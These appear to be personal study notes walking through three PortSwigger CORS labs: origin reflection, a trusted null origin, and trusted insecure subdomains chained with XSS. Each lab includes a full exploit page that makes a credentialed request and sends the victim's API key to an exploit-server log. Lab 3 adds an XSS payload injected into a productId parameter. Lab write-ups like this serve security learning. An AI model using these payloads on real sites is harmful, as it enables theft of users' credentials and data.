--------------------------------------------------------------------------------------------
                        # Cross Origin Resource Sharing (CORS)                              

# Resources:

>> labs:  
   - https://portswigger.net/web-security/cors
  
>> Video:
   - https://www.youtube.com/watch?v=-AkazVFgTJY&list=PLTSGZiCtCBfMMLkmaN7tGEhbc0QbOEtEA&index=33&pp=iAQB
   - https://www.youtube.com/watch?v=hMEzLAmiN30&list=PLTSGZiCtCBfMMLkmaN7tGEhbc0QbOEtEA&index=34&pp=iAQB

>> What is CORS (cross-origin resource sharing)?
   - Cross-origin resource sharing (CORS) is a browser mechanism which enables controlled access to resources located outside of a given domain. It extends and adds flexibility to the same-origin policy (SOP)
   
>> What is SOP (Same-origin policy)?
   - The same-origin policy is a restrictive cross-origin specification that limits the ability for a website to interact with resources outside of the source domain.
   - The same-origin policy is a web browser security mechanism that aims to prevent websites from attacking each other.

# Lab-1: CORS vulnerability with basic origin reflection:

- Log in with (wiener: peter)
- Intercept the *(GET /accountDetails)* request
- Add a header *Origin: itsme.com* to see if it allows an origin
- It will respond with *Access-Control-Allow-Origin: itsme.com*
- Now craft a web page when it's clicked by the admin you get the API key
- The Page code to add it to the exploit server:
```html
<html>
  <body>
    <script>
      var req = new XMLHttpRequest();
      var url = "https://0a54003003ec551c8297970600b70004.web-security-academy.net/accountDetails"
      req.open('GET', url, true);   
      req.withCredentials = true;
      req.send(null)
      req.onreadystatechange = function() {
        if(req.readyState == XMLHttpRequest.DONE){
          fetch("/log?key" + req.responseText)
        }
      }
    </script>
  </body>
</html>
```
- Then Send it to the victim and go to the *Access Log* to see the requests
- Observe the *GET /log?key* request that contains the data of the API Key

# Lab-2: CORS vulnerability with trusted null origin:

- Log in with (wiener: peter)
- Intercept the *(GET /accountDetails)* request
- Add a header *Origin: itsme.com* to see if it allows an origin 
- If yes, It will respond with *Access-Control-Allow-Origin: itsme.com*
- Now try *Origin: null* and see if it's in the response or not
- Time to craft the page to get the API key of the admin
- The page code add it to the exploit server:
```html
<html>
  <body>
    <iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html, <script>
      var req = new XMLHttpRequest();
      req.onload = reqListener;
      req.open('GET', 'https://0a8d00270371a63e806a3f35008100cf.web-security-academy.net/accountDetails', true);
      req.withCredentials = true;
      req.send();
      function reqListener() {
        location = 'https://exploit-0add001f0308a68680ad3ed401eb001c.exploit-server.net/log?key='+encodeURIComponent(this.responseText);
      };
      </script>">
    </iframe>
  </body>
</html>
```
- Then Send it to the victim and go to the *Access Log* to see the requests
- Observe the *GET /log?key* request that contains the data of the API Key

# Lab-3: CORS vulnerability with trusted insecure protocols:

- Log in with (wiener: peter)
- Intercept the *(GET /accountDetails)* request
- Add a header *Origin: itsme.com* to see if it allows an origin 
- If yes, It will respond with *Access-Control-Allow-Origin: itsme.com*
- Then try *Origin: null* and see if it's in the response or not
- Now try *Origin: http://hi.YOUR_Lab_ID.web-security-academy.net* 
- If you see *Access-Control-Allow-Origin: url* then it's vuln. cause it trust all the subdomains of its domain
- Scan the page to get a subdomain that talk with the domain "Check Stock functionality"
- Intercept the *Check Stock* request and see if it's vuln. to a XSS vulnerability
- Time to craft the page to get the API key of the admin
- The page code add it to the exploit server:
```html
<html>
  <body>
    <h1>hello</h1>
    <script> 
      document.location="http://stock.0ae400620328752c84f1337300cf0003.web-security-academy.net/?productId=<script>var xhr=new XMLHttpRequest();var url='https://0ae400620328752c84f1337300cf0003.web-security-academy.net/accountDetails';xhr.onreadystatechange=function(){if(xhr.readyState==XMLHttpRequest.DONE){fetch('https://exploit-0a2a00cf03f67552848332a7010d0023.exploit-server.net/log?key='%2bxhr.responseText)};};xhr.open('GET',url,true);xhr.withCredentials=true;xhr.send(null);%3c/script>&storeId=1"
      </script> 
  </body>
</html>
```
- This Code uses the Check stock functionality that is vulnerable to XSS to send a request to the domain server to exploit the CORS Vuln. to get the admin API key
- Then Send it to the victim and go to the *Access Log* to see the requests
- Observe the *GET /log?key* request that contains the data of the API Key